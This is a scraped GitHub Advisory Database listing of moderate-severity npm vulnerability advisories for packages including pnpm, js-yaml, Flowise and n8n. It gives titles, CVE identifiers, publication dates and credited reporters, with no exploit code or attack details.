Skip to content

GitHub Advisory Database

Security vulnerability database inclusive of CVEs and GitHub originated security advisories from the world of open source software.

Filter advisories

Unreviewed advisories

CC-BY-4.0 License
Language support
About GitHub Advisory Database
Filter advisories

Filter advisories

GitHub reviewed advisories
All reviewed
5,000+
Composer
5,000+
Erlang
86
GitHub Actions
54
Go
4,175
Maven
5,000+
npm
5,000+
NuGet
1,019
pip
5,000+
Pub
13
RubyGems
1,102
Rust
1,421
Swift
61
Unreviewed advisories
All unreviewed
5,000+

2,345 advisories

Loading
Turbo: Login callback CSRF/session fixation Moderate
CVE-2026-45773 was published for turbo (npm) May 19, 2026
DanStuartDept Credited to DanStuartDept, jpleyden98, and ToshB jpleyden98 jpleyden98
ToshB ToshB
JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases Moderate
CVE-2026-53550 was published for js-yaml (npm) Jun 15, 2026
0xbughunter Credited to 0xbughunter, soren121, mazze93, G-Rath, dargmuesli, and omgovich soren121 soren121
mazze93 mazze93 G-Rath G-Rath dargmuesli dargmuesli omgovich omgovich
pnpm: Reserved bin name deletes PNPM_HOME during global remove Moderate
CVE-2026-55699 was published for pnpm (npm) Jun 26, 2026
pnpm: Repository config can expand victim environment secrets into registry requests before scripts run Moderate
CVE-2026-55180 was published for pnpm (npm) Jun 26, 2026
mldangelo-oai Credited to mldangelo-oai
pnpm binds unscoped user-level npm auth credentials to a repository-selected registry Moderate
CVE-2026-50017 was published for pnpm (npm) Jun 26, 2026
mosskappa Credited to mosskappa
pnpm: Git Fetch Argument Injection via Lockfile resolution.commit Moderate
CVE-2026-50014 was published for pnpm (npm) Jun 26, 2026
tempcollab Credited to tempcollab
pnpm Has an Integrity Check Bypass via Missing Lockfile Integrity Field Moderate
CVE-2026-50021 was published for pnpm (npm) Jun 26, 2026
tempcollab Credited to tempcollab
pnpm: Unsafe default behavior breaks integrity check Moderate
CVE-2026-50573 was published for pnpm (npm) Jun 26, 2026
aszx87410 Credited to aszx87410
js-toml has silent type confusion via falsy-primitive duplicate-key bypass Moderate
CVE-2026-50029 was published for js-toml (npm) Jun 26, 2026
CosmicCrusader23 Credited to CosmicCrusader23
@microsoft/kiota-http-fetchlibrary: Bearer token and Cookie leak across origin on redirect due to case-mismatched scrub in fetchRequestAdapter Moderate
CVE-2026-49336 was published for @microsoft/kiota-http-fetchlibrary (npm) Jun 26, 2026
tonghuaroot Credited to tonghuaroot, baywet, and adrian05-ms baywet baywet
adrian05-ms adrian05-ms
pnpm: Tarball hash of GitHub git dependencies is not stored in lockfile Moderate
CVE-2026-48995 was published for pnpm (npm) Jun 26, 2026
dsherret Credited to dsherret
MJML allows mj-include directory traversal due to an incomplete fix for CVE-2020-12827 Moderate
CVE-2025-67898 was published for mjml (npm) Dec 15, 2025
LambArchie Credited to LambArchie
@cyclonedx/cdxgen: Maven project scanning may allow shell command injection through repository-controlled module paths Moderate
GHSA-5vwr-qchf-q4pf was published for @cyclonedx/cdxgen (npm) Jun 26, 2026
aleff-github Credited to aleff-github
@sigstore/core has DSSE payloadType type-binding failure Moderate
CVE-2026-48758 was published for @sigstore/core (npm) Jun 26, 2026
Str1ckl4nd Credited to Str1ckl4nd and Zyy0530 Zyy0530 Zyy0530
@anthropic-ai/claude-code has an Insecure Temporary File in /copy Command that Enables Response Disclosure and Symlink-Based File Write Moderate
CVE-2026-46406 was published for @anthropic-ai/claude-code (npm) Jun 25, 2026
undici vulnerable to cross-user information disclosure via shared cache whitespace bypass Moderate
CVE-2026-9678 was published for undici (npm) Jun 18, 2026
AndrewMohawk Credited to AndrewMohawk, mcollina, and UlisesGascon mcollina mcollina
UlisesGascon UlisesGascon
hono Improperly Handles JSX Attribute Names Allows HTML Injection in hono/jsx SSR Moderate
CVE-2026-56761 was published for hono (npm) Apr 16, 2026
tndud042713 Credited to tndud042713 and throwersedrickoctauious-del throwersedrickoctauious-del throwersedrickoctauious-del
n8n has a Stored XSS Vulnerability in its Form Trigger Moderate
CVE-2026-56358 was published for n8n (npm) Mar 27, 2026
tr4ce-ju Credited to tr4ce-ju
n8n: SQL Injection in MySQL, PostgreSQL, and Microsoft SQL nodes Moderate
CVE-2026-56351 was published for n8n (npm) Feb 26, 2026
Flowise has Insufficient Password Salt Rounds Moderate
CVE-2026-56272 was published for flowise (npm) Mar 5, 2026
kolega-ai-dev Credited to kolega-ai-dev
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request Moderate
CVE-2026-56270 was published for flowise (npm) Apr 16, 2026
berkdedekarginoglu Credited to berkdedekarginoglu
Flowise: Weak Default Token Hash Secret Moderate
CVE-2026-56269 was published for flowise (npm) Apr 16, 2026
kolega-ai-dev Credited to kolega-ai-dev
FlowiseDB vulnerable to SQL Injection by authenticated users Moderate
CVE-2025-71332 was published for flowise (npm) Apr 7, 2025
Tribal1012 Credited to Tribal1012
http-proxy-middleware `router` host+path substring matching allows Host-header-driven backend routing bypass Moderate
CVE-2026-55602 was published for http-proxy-middleware (npm) Jun 18, 2026
Str1ckl4nd Credited to Str1ckl4nd, Zyy0530, 7thParkk, G-Rath, and ethantkoenig Zyy0530 Zyy0530
7thParkk 7thParkk G-Rath G-Rath ethantkoenig ethantkoenig
@actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields Moderate
CVE-2026-50179 was published for @actual-app/web (npm) Jun 22, 2026
offset Credited to offset and MatissJanis MatissJanis MatissJanis
ProTip! Advisories are also available from the GraphQL API
CC-BY-4.0 License
Language support
About GitHub Advisory Database